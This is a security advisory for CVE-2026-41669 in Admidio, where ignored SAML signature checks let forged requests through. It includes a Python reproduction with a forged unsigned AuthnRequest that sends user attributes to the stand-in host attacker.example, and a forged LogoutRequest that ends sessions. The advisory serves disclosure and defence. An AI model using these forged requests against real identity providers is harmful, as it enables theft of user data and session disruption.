PT-2026-36106 · Admidio · Admidio

Offset

Published: 2026-04-29 · Updated: 2026-05-07 · CVE-2026-41669

CVSS v3.1: 8.2 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
Name of the Vulnerable Software and Affected Versions: Admidio versions prior to 5.0.9

Description: The SAML Identity Provider implementation fails to check the return value of validateSignature(). That function reports failure by returning an error string rather than throwing an exception, and its callers handleSSORequest() and handleSLORequest() discard the returned value. As a result the "smc require auth signed" configuration option has no effect: unsigned or invalidly signed SAML AuthnRequests and LogoutRequests are processed as if they were valid.

An attacker who gets a logged-in user to submit a forged AuthnRequest that directs the IdP's response to an attacker-controlled endpoint can obtain that user's attributes (login name, email and roles). The same gap lets an attacker forge LogoutRequests to terminate user sessions and trigger cascading single logouts across the registered Service Providers.

Recommendations: Update to version 5.0.9. Until the update is applied, restrict access to the SAML SSO and SLO modules and do not rely on the "smc require auth signed" setting as a security control.
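The bug class above (a validator that signals failure through its return value, and callers that never look at it) is easy to reproduce. The following is an added illustration written for this page; it is not Admidio's code and is in Python rather than the project's PHP. The SP metadata URL, signing key, user attributes, ACS URLs and session table are constructed sample data, REQUIRE_AUTH_SIGNED stands in for the "smc require auth signed" option, and an HMAC-SHA256 keyed per SP replaces the RSA/ECDSA signature of a real SAML HTTP-Redirect binding so the example runs on the standard library alone. The `fixed` flag toggles the one-line difference between the vulnerable and the corrected handler.

```python
import base64, hashlib, hmac, zlib
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

# Constructed data (not from Admidio): one registered SP with its signing key and the
# attributes of a logged-in user. A real HTTP-Redirect binding signature is RSA/ECDSA
# over the query string; an HMAC-SHA256 keyed per SP stands in so this runs on the
# standard library alone.
SP_KEYS = {"https://sp.example.org/metadata": b"sp-signing-key"}
USER_ATTRIBUTES = {"login": "alice", "email": "alice@example.org", "roles": ["member"]}
REQUIRE_AUTH_SIGNED = True  # plays the role of the advisory's "smc require auth signed"
SIG_ALG = "hmac-sha256"     # hypothetical SigAlg value for the HMAC stand-in
NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion"}

def encode_saml(xml):
    # Raw DEFLATE + base64, as the HTTP-Redirect binding encodes SAMLRequest.
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(xml.encode()) + comp.flush()).decode()

def decode_saml(value):
    return ET.fromstring(zlib.decompress(base64.b64decode(value), -15))

def signed_query(saml_request, key):
    # What an honest SP sends: SAMLRequest, SigAlg and a detached Signature.
    signed_data = urlencode({"SAMLRequest": saml_request, "SigAlg": SIG_ALG})
    mac = hmac.new(key, signed_data.encode(), hashlib.sha256).digest()
    return {"SAMLRequest": saml_request, "SigAlg": SIG_ALG,
            "Signature": base64.b64encode(mac).decode()}

def validate_signature(params, issuer):
    # Returns True on success or an error *string* on failure, never raises: the
    # calling convention the advisory describes for validateSignature().
    if "Signature" not in params or "SigAlg" not in params:
        return "request is not signed"
    key = SP_KEYS.get(issuer)
    if key is None:
        return f"unknown issuer {issuer}"
    signed_data = urlencode({"SAMLRequest": params["SAMLRequest"], "SigAlg": params["SigAlg"]})
    expected = hmac.new(key, signed_data.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, base64.b64decode(params["Signature"])):
        return "signature mismatch"
    return True

def require_valid_signature(params, issuer, fixed):
    # The IdP's check. fixed=False reproduces the bug: the result is computed and dropped.
    if not REQUIRE_AUTH_SIGNED:
        return
    result = validate_signature(params, issuer)
    if fixed and result is not True:
        raise PermissionError(f"request rejected: {result}")
    # vulnerable path: result may hold "request is not signed" and processing continues

def handle_sso_request(params, fixed):
    # IdP side of an AuthnRequest: the Response carrying the user's attributes goes to
    # whatever AssertionConsumerServiceURL the request named.
    req = decode_saml(params["SAMLRequest"])
    require_valid_signature(params, req.find("saml:Issuer", NS).text, fixed)
    return {"destination": req.get("AssertionConsumerServiceURL"),
            "attributes": dict(USER_ATTRIBUTES)}

def handle_slo_request(params, sessions, fixed):
    # IdP side of a LogoutRequest: drops the session and returns the other SPs that
    # will receive a cascaded LogoutRequest.
    req = decode_saml(params["SAMLRequest"])
    issuer = req.find("saml:Issuer", NS).text
    require_valid_signature(params, issuer, fixed)
    return [sp for sp in sessions.pop(req.find("saml:NameID", NS).text, []) if sp != issuer]

def authn_request(issuer, acs_url):
    return encode_saml(
        f'<samlp:AuthnRequest xmlns:samlp="{NS["samlp"]}" xmlns:saml="{NS["saml"]}" '
        f'ID="_1" Version="2.0" AssertionConsumerServiceURL="{acs_url}">'
        f'<saml:Issuer>{issuer}</saml:Issuer></samlp:AuthnRequest>')

def logout_request(issuer, name_id):
    return encode_saml(
        f'<samlp:LogoutRequest xmlns:samlp="{NS["samlp"]}" xmlns:saml="{NS["saml"]}" '
        f'ID="_2" Version="2.0"><saml:Issuer>{issuer}</saml:Issuer>'
        f'<saml:NameID>{name_id}</saml:NameID></samlp:LogoutRequest>')

def forged_sso_outcome(fixed):
    # Unsigned AuthnRequest naming a registered SP but an attacker-controlled ACS URL.
    forged = {"SAMLRequest": authn_request("https://sp.example.org/metadata",
                                           "https://attacker.example/collect")}
    try:
        return handle_sso_request(forged, fixed)["destination"]
    except PermissionError as exc:
        return str(exc)

def forged_slo_outcome(fixed):
    # Unsigned LogoutRequest for alice: (cascade targets or error, session still alive?).
    sessions = {"alice": ["https://sp.example.org/metadata", "https://other-sp.example/metadata"]}
    forged = {"SAMLRequest": logout_request("https://sp.example.org/metadata", "alice")}
    try:
        return handle_slo_request(forged, sessions, fixed), "alice" in sessions
    except PermissionError as exc:
        return str(exc), "alice" in sessions
```

With `fixed=False`, `forged_sso_outcome` hands the user's attributes to `https://attacker.example/collect` and `forged_slo_outcome` ends alice's session and queues a logout for the other SP, even though REQUIRE_AUTH_SIGNED is on; with `fixed=True` both forged requests are refused while a request signed with the SP's key still succeeds. When reviewing code that wraps a validator like this, treat any return other than the explicit success value as fatal, or change the validator to throw so that a forgotten check cannot silently pass.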

Weakness Enumeration: Improper Verification of Cryptographic Signature (CWE-347)

Related Identifiers: CVE-2026-41669, GHSA-25CW-98HG-G3CG

Affected Products: Admidio